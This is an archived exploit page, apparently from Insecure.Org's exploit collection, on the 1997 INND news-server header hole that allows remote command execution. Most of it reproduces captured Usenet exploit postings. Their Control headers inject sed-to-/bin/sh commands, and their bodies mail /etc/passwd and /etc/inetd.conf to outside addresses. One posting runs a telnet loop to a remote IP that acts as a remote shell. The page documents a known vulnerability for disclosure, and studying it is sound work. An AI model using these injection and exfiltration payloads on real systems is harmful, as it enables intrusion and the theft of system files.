INND header control characters hole

Summary
Description:This hole allows someone to attack THOUSANDS of news servers at once by inserting special characters into post headers. This has been widely exploited.
Author:Been known for a while
Compromise:You can REMOTELY execute arbitrary commands under UID of news server.
Vulnerable Systems:Systems running versions of INND prior to and including 1.5, some sites with later versions are vulnerable if they forgot to delete some scripts in the new installation
Date:Was widely exploited in March 1997
Notes:Here are some examples of exploit postings
Details

Exploit:

[This was posted to a newsgroup:  If someone has a copy w/o the dejanews 
crap, please send it to me.  Thanks.]
[. . .]

FWIW I'll include their complete bodies below my .sig.

-Scott
---
Scott Lystig Fritchie, Network Engineer          MRNet Internet Services, Inc.
fritchie@mr.net, PGP key #152B8725               Minnesota Regional Network
v: 612/362.5820, p: 612/637.9547                 2829 University Ave SE
http://www.mr.net/~fritchie/                     Minneapolis, MN  55414

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- 

Path: news1.mr.net!mr.net!europa.clark.net!cpk-news-hub1.bbnplanet.com!news.bbnplanet.com!rill.news.pipex.net!pipex!strath-cs!nntphost.dur.ac.uk!nntp
From: David Poulet <D.G.Poulet@durham.ac.uk>
Newsgroups: alt.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 09:51:47 GMT
Organization: University of Durham, Durham, UK.
Lines: 4
Message-ID: <5gj47j$95n@mercury.dur.ac.uk>
NNTP-Posting-Host: juno.dur.ac.uk

#+
 (/bin/uname -a; /bin/who;) | /usr/ucb/Mail -s d.g.poulet@durham.ac.uk
#-

Path: news1.mr.net!mr.net!news.maxwell.syr.edu!news.bc.net!rover.ucs.ualberta.ca!van.istar!west.istar!news.trytel.com!new-netra!wojtek
From: Wojciech Tryc <wojtek@tryc.on.ca>
Newsgroups: ott.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh`
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh`
Date: Mon, 17 Mar 1997 11:43:24 -0500
Organization: Trytel Internet
Lines: 3
Sender: wojtek@new-netra
Message-ID: <ML-2.2.858617004.6838.wojtek@new-netra>
Reply-To: Wojciech Tryc <wojtek@tryc.on.ca>
NNTP-Posting-Host: firewall.sofpak.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd)|/usr/ucb/Mail wojtek@trytel.com
#-
Path: news1.mr.net!mr.net!news.sgi.com!newsfeed.nacamar.de!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg test
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9121@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 6

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bin/mailx root@[193.12.106.1]
#-

~|/bin/sed -n '/^#+/,/^#-/p'|/bin/sh;echo ignore this

Path: news1.mr.net!mr.net!newsfeed.direct.ca!news.maxwell.syr.edu!newsfeed.nacamar.de!jupiter.nic.dtag.de!news.dvz-mv.de!boettch
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: dvz.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 12:23:23 GMT
Organization: DVZ Datenverarbeitungszentrum M-V GmbH
Lines: 4
Sender: boettch@develop01 (Ronald Boettcher)
Approved: newgroups-request@uunet.uu.net
Message-ID: <5gjd3r$eqf@ns.dvz-mv.de>
NNTP-Posting-Host: develop01.dvz-mv.de

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/bin/Mail -s info bin@le.owlnet.rice.edu
#-

Path: news1.mr.net!mr.net!news.sgi.com!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9221@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bin/mailx root@[193.12.106.1]
#-

Path: news1.mr.net!mr.net!news.sgi.com!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg test
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9122@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 6

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail root@[193.12.106.1]
#-

~|/bin/sed -n '/^#+/,/^#-/p'|/bin/sh;echo ignore this

Path: news1.mr.net!mr.net!news.sgi.com!newsfeed.nacamar.de!nntp.uio.no!uninett.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9223@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
#-

Path: news1.mr.net!mr.net!data.ramona.vix.com!sonysjc!sonybc!newsjunkie.ans.net!newsfeeds.ans.net!paperboy.amoco.com!tabloid!usenet
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 21:44:08 GMT
Organization: Amoco
Lines: 3
Approved: newgroups-request@uunet.uu.net
Message-ID: <5gkdv8$5uc@tabloid.amoco.com>

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info tafeyereisen@amoco.com
#-
Path: news1.mr.net!mr.net!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!cpk-news-hub1.bbnplanet.com!news.bbnplanet.com!news.sesqui.net!rice!nntp.xxxxxxxxx.xxx!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: Sat, 15 Mar 1997 15:15:15 GMT
Organization: Rice University, Houston, Texas
Lines: 3
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9224@uunet.uu.net>
NNTP-Posting-Host: long-eared.owlnet.rice.edu

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info bin@le.owlnet.rice.edu
#-
Path: news1.mr.net!mr.net!news.sgi.com!newsfeed.nacamar.de!nntp.uio.no!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderatedControl: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9220@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-
 
Path: news1.mr.net!mr.net!news-peer.gsl.net!news.gsl.net!news.maxwell.syr.edu!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg test
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9120@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 6

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-
 
~|/bin/sed -n '/^#+/,/^#-/p'|/bin/sh;echo ignore this
 
Path: news1.mr.net!mr.net!news.sgi.com!news.maxwell.syr.edu!EU.net!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9020@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 12

#+
while :; do
  IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
  if [ X"$IN" != X"$OIN" ]; then
    (/bin/sleep 2; eval "$IN" 2>&1) |
      /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
    OIN=$IN
  fi
  sleep 30
done
#-

Path: news1.mr.net!mr.net!news.maxwell.syr.edu!news.apfel.de!news-fra1.dfn.de!news-ge.switch.ch!news-zh.switch.ch!not-for-mail
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: Sat, 15 Mar 1997 15:15:15 GMT
Organization: Rice University, Houston, Texas
Lines: 3
Approved: newgroups-request@uunet.uu.net
Message-ID: <6830201540.9224@uunet.uu.net>
NNTP-Posting-Host: sunag.switch.ch

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info sysadmin@switch.ch
#-
Path: news1.mr.net!mr.net!news.maxwell.syr.edu!newsfeed.nacamar.de!jupiter.nic.dtag.de!news.dvz-mv.de!boettch
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: dvz.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 12:42:44 GMT
Organization: DVZ Datenverarbeitungszentrum M-V GmbH
Lines: 4
Sender: boettch@develop01 (Ronald Boettcher)
Approved: newgroups-request@uunet.uu.net
Message-ID: <5gje84$eqf@ns.dvz-mv.de>
NNTP-Posting-Host: develop01.dvz-mv.de

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/bin/Mail -s info r.boettcher@dvz-mv.de
#-
 
Path: news1.mr.net!mr.net!feeder.chicago.cic.net!news.sprintlink.net!news-peer.sprintlink.net!europa.clark.net!news.clark.net!news.clark.net!not-for-mail
From: news@clark.net
Newsgroups: clarknet.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 12:23:23 GMT
Organization: Just an experiment
Lines: 4
Sender: news@clark.net
Approved: news@clark.net
Message-ID: <abcdefg-this-is-a-test@clark.net.123456.4>
NNTP-Posting-Host: clarknet.clark.net
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
 
#+
(/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.co
nf) | /usr/bin/mailx -s experiment news@clark.net
#-


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]